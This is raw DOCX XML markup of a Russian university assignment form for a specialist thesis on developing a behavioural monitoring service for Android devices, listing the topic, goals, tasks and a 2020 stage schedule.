                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="00000A"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pP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высшего образования</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="240" w:lineRule="exact"/>
              <w:ind w:firstLine="400"/>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firstLine="400"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:color w:val="00000A"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>РТУ МИРЭА</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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firstLine="400"/>
        <w:contextualSpacing/>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firstLine="400"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="4888" w:type="pct"/>
        <w:tblInd w:w="108" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3713"/>
        <w:gridCol w:w="1999"/>
        <w:gridCol w:w="3710"/>
      </w:tblGrid>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00583156">
        <w:trPr>
          <w:trHeight w:val="549"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970"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СОГЛАСОВАНО</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УТВЕРЖДАЮ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00583156">
        <w:trPr>
          <w:trHeight w:val="80"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970"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Заведующий кафедрой</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Директор института</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00583156">
        <w:trPr>
          <w:trHeight w:val="82"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:firstLine="400"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1061" w:type="pct"/>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="400"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1969" w:type="pct"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:firstLine="400"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00583156">
        <w:trPr>
          <w:trHeight w:val="189"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970"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b/>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spacing w:line="20" w:lineRule="atLeast"/>
              <w:ind w:firstLine="400"/>
              <w:contextualSpacing/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>О.В. Трубиенко</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1061" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
            </w:tcBorders>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ind w:firstLine="400"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>А.А. Бакаев</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00583156">
        <w:trPr>
          <w:trHeight w:val="75"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970"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c>
          <w:tcPr>
            <w:tcW w:w="1061" w:type="pct"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:suppressAutoHyphens/>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:ind w:firstLine="400"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1969"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r>
      <w:tr w:rsidR="00583156" w:rsidRPr="00583156" w:rsidTr="00583156">
        <w:trPr>
          <w:trHeight w:val="75"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1970"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c>
          <w:tcPr>
            <w:tcW w:w="1061" w:type="pct"/>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firstLine="400"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583156">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>«___</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00583156">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>_»  _</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00583156">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>_______________20___ г</w:t>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t>«____»  ________________20___ г.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583156">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ЗАДАНИЕ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:ind w:firstLine="400"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00583156">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:bCs/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>на выполнение выпускной квалификационной работы специалиста</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16"/>
        <w:gridCol w:w="2172"/>
        <w:gridCol w:w="534"/>
        <w:gridCol w:w="4960"/>
      </w:tblGrid>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Обучающийся</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7598" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:firstLine="400"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00583156" w:rsidRPr="004A5FE1" w:rsidRDefault="004A5FE1" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:firstLine="400"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Князев Константин Антонович</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7598" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>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sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>ф</w:t>
            </w:r>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>амилия, имя, отчество</w:t>
            </w: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center"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>15Б0077</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Шифр</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7598" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left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Направление</w:t>
            </w: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подготовки</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2153"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10.05.04</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="529"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Информационно - аналитические системы безопасности</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2153" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w:rsidR="00583156" w:rsidRPr="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
            <w:pPr>
              <w:autoSpaceDE/>
              <w:autoSpaceDN/>
              <w:ind w:firstLine="400"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00583156">
              <w:rPr>
                <w:rFonts w:cs="Times New Roman"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>индекс направления</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="529"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bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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i/>
                <w:iCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>специальность</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Группа</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7598" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>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БИСО-02-15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00583156" w:rsidRDefault="00583156" w:rsidP="00583156">
      <w:pPr>
        <w:widowControl/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0016468A" w:rsidRDefault="000853C0" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Тема выпускной квалификационной работы специалиста</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRPr="0016468A" w:rsidRDefault="000853C0" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0016468A">
        <w:t>«Разработка сервиса поведенческого анализа функционирования мобильных устройств на операционных системах андроид»</w:t>
      </w:r>
    </w:p>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Цель и задачи выпускной квалификационной работы специалиста</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Цель работы:</w:t>
      </w:r>
      <w:r w:rsidR="0019393C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0019393C" w:rsidRPr="0019393C">
        <w:t>разработать и реализовать программное решение для реализации мониторинга устройств на операционной системе андроид.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Задачи работы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>1)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>провести анализ существующих ОС МПУ с последующим выбором целевой ОС;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>2)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>выделить набор необходимых параметров для мониторинга;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>3)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>провести анализ существующих средств мониторинга поведения мобильных устройств на выбранной операционной системе;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="0019393C" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>4)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0019393C">
        <w:t xml:space="preserve">реализовать </w:t>
      </w:r>
      <w:r>
        <w:t>средство для поведенческого мониторинга мобильных устройств.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B57AF" w:rsidRDefault="004B57AF" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000853C0" w:rsidRDefault="000853C0" w:rsidP="00087A38">
      <w:pPr>
        <w:pStyle w:val="120"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Этапы выпускной квалификационной работы специалиста</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1063"/>
        <w:gridCol w:w="5653"/>
        <w:gridCol w:w="1461"/>
        <w:gridCol w:w="1461"/>
      </w:tblGrid>
      <w:tr w:rsidR="0019393C" w:rsidTr="00087A38">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1121" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>№ этапа</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6392" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Содержание этапа ВКР специалиста</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Результат выполнения этапа ВКР</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1461" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Срок выполнения</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019393C" w:rsidTr="0019393C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1121" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="00087A38" w:rsidP="00583156">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Анализ </w:t>
            </w:r>
            <w:r w:rsidR="00583156">
              <w:t>современных мобильных операционных систем</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1231" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRPr="00583156"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1.09.2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019393C" w:rsidTr="0019393C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1121" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002B4F1F" w:rsidRDefault="002B4F1F" w:rsidP="002B4F1F">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Провести оценку возможностей существующих сервисов</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0019393C" w:rsidRDefault="002B4F1F" w:rsidP="002B4F1F">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>посредством метода анализа иерархий</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20.09.2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019393C" w:rsidTr="0019393C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1121" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="002B4F1F" w:rsidP="002B4F1F">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Спроектировать систему мониторинга операционной системы мобильного персонального устройства с учетом выделенного набора параметров мониторинга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12.10.2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019393C" w:rsidTr="0019393C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1121" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="001930E7" w:rsidP="002B4F1F">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Р</w:t>
            </w:r>
            <w:r w:rsidRPr="001930E7">
              <w:t>еализовать собст</w:t>
            </w:r>
            <w:r w:rsidR="002B4F1F">
              <w:t>венную систему мониторинга операционной системы мобильного персонального устройства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20.10.2020</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019393C" w:rsidTr="0019393C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1121" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRDefault="0019393C" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6392" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0019393C" w:rsidRPr="00583156" w:rsidRDefault="007F0C6F" w:rsidP="00087A38">
            <w:pPr>
              <w:pStyle w:val="120"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
